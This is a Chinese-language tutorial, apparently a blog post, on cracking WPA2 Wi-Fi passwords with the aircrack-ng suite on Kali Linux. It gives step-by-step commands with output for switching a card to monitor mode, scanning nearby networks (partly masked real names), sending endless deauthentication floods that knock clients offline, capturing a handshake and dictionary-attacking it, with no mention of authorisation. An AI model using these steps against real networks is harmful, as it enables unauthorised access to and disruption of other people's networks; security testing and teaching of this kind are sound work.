使用aircrack-ng抓包 iwconfig命令查看无线网卡有没有加载成功,如图,出现了wlan0的无线设备,即为加载成功 root@kali:~# iwconfig lo no wireless extensions. wlan0 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions. 查看周围网络 airodump-ng wlan0 很多情况下会发生如下所示的报错:“ioctl(SIOCSIWMODE) failed: Device or resource busy” 这种情况我们需要先卸载设备,然后设置monitor模式,重新启用即可!命令: ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up 运行完这三个命令后再次运行airodump wlan0,查看需要破解的网在哪个频道(CH),数据传输量(Beacons)如何。 CH 9 ][ Elapsed: 1 min ][ 2017-01-12 23:00 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID A4:**** -56 40 82 0 11 54e. WPA2 CCMP PSK M***ie 08:**** -63 200 0 0 6 54e WPA2 CCMP PSK N***ore_A**0BF 1C:**** -64 25 331 0 6 54e. WPA2 CCMP PSK T***S F0:**** -64 18 797 0 11 54e WPA2 CCMP PSK X***mi_8029 C8:**** -76 13 0 0 9 54e WPA2 CCMP PSK Z*** E4:**** -80 19 0 0 11 54e. WPA2 CCMP PSK 6*** E4:**** -84 14 215 0 13 54e WPA2 CCMP PSK M***URY_1F04 EC:**** -84 13 0 0 1 54e. WPA2 CCMP PSK k***board 1C:**** -86 14 1 0 1 54e. WPA2 CCMP PSK T***INK_F369DE C8:**** -88 10 36 0 10 54e WPA2 CCMP PSK T***a_5021 F0:**** -86 10 0 0 3 54e WPA2 CCMP PSK X***mi_B37C 04:**** -88 6 0 0 1 54e. WPA2 CCMP PSK J***322BEC D0:**** -89 11 0 0 11 54e. OPN <***gth: 0> 88:**** -90 4 0 0 11 54e. WPA2 CCMP PSK z***yi C4:**** -92 2 0 0 13 54e. WPA2 CCMP PSK D***nk_DIR-223 80:**** -94 5 0 0 6 54e. WPA2 CCMP PSK w***-8018 88:**** -94 6 0 0 11 54e. WPA2 CCMP PSK L***ndinter 8E:**** -94 4 0 0 11 54e. WPA2 CCMP PSK A*** 30:**** -95 4 0 0 11 54e. WPA2 CCMP PSK J***u-NET 1C:**** -98 3 0 0 11 54e. WPA2 CCMP PSK M***URY_18C0 14:**** -95 2 0 0 11 54e. WPA2 CCMP PSK T***INK_8082 30:**** -96 3 0 0 6 54e. WPA2 CCMP PSK T***INK_6A28 D0:**** -89 4 0 0 11 54e. WPA2 CCMP PSK 3***ifi-QCMHZY-2.4G BSSID STATION PWR Rate Lost Frames Probe A4:**** B8:**** -72 0 -24e 0 7 A4:**** 80:**** -90 1e- 1 0 75 08:**** DC:**** -26 0 -24e 18 33 08:**** 54:**** -42 0 - 1 0 17 N**re_A***BF 1C:**** 94:**** -74 0e- 1 0 332 接下来开始抓我们想要的包: airodump-ng -w sniffer -c 11 wlan0 解释:-w表示保存握手包,“sniffer”为包的名称,可随意设置,最终的文件为sniffer-01.cap,-c 3表示指定频道11,wlan0指定网卡设备。 当然我们也可以指定破解我们想要的AP airodump-ng -w sniffer -c 11 --bssid F0:B4:**** wlan0 解释:--bssid嗅探指定无线AP,后面跟着AP的bssid,如下图 这时候可以等待握手包的获取。 为了加速握手包的获取,我们可以使用aireplay来给AP发送断开包: root@kali:~# aireplay-ng -0 0 -a F0:B4:**** wlan0 解释:-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值 23:26:08 Waiting for beacon frame (BSSID: F0:B4:****) on channel 11 NB: this attack is more effective when targeting a connected wireless client (-c). 23:26:08 Sending DeAuth to broadcast -- BSSID: [F0:B4:****] 23:26:09 Sending DeAuth to broadcast -- BSSID: [F0:B4:****] 23:26:09 Sending DeAuth to broadcast -- BSSID: [F0:B4:****] 23:26:10 Sending DeAuth to broadcast -- BSSID: [F0:B4:****] 若上一步的窗口右上角中出现握手包,WPA handshake: F0:B4:**** 后面跟着bssid,即为抓到了该无线网的握手包,我们可以使用CTRL+C来停止嗅探握手包。 如果始终没有出现握手包,则可以尝试加入客户端的mac: root@kali:~# aireplay-ng -0 0 -a F0:B4:**** -c 3C:33:**** wlan0 23:28:57 Waiting for beacon frame (BSSID: F0:B4:****) on channel 11 23:28:57 Sending 64 directed DeAuth. STMAC: [3C:33:****] [ 5|64 ACKs] 23:28:58 Sending 64 directed DeAuth. STMAC: [3C:33:****] [ 0|52 ACKs] 23:28:59 Sending 64 directed DeAuth. STMAC: [3C:33:****] [52|59 ACKs] 使用字典爆破握手包 这一步是整个密码破解的关键,能否成功,取决与你的CPU是否强大,还有你字典的大小,以及字典的质量,密码的复杂程度。 aircrack-ng sniffer-01.cap -w /mnt/hgfs/D/Downloads/1.txt 解释:“sniffer-01.cap”为指定我们需要破解的握手包,直接写文件名表示文件在当前文件夹下,"-w"指定字典文件后面跟着字典的路径。 Aircrack-ng 1.2 rc4 [00:01:29] 56836/276301591 keys tested (661.85 k/s) Time left: 4 days, 20 hours, 5 minutes, 19 seconds 0.02% Current passphrase: 000055885588 Master Key : C9 8F 1E DA 11 AB E1 22 05 C0 CF 4B 39 BC 11 DF BA AE 04 FE 5C D9 BC 5D 37 12 78 B7 2C 26 C0 FF Transient Key : 05 A6 DB 82 4D 1C 42 AA D3 A9 DB 15 D6 CD 73 FB CB A5 34 2B 5D 9A 59 3C 3B A7 7D 2C 75 05 9F 89 BA 3D 3F C6 2C C4 A4 84 83 45 AE 78 7E 0A 77 0F 41 DD 35 48 09 99 13 EA D6 80 BD 17 AE D2 E3 C8 EAPOL HMAC : 28 8D 48 F4 1D 48 E9 AC B9 FF B1 CB CF 8F 88 EB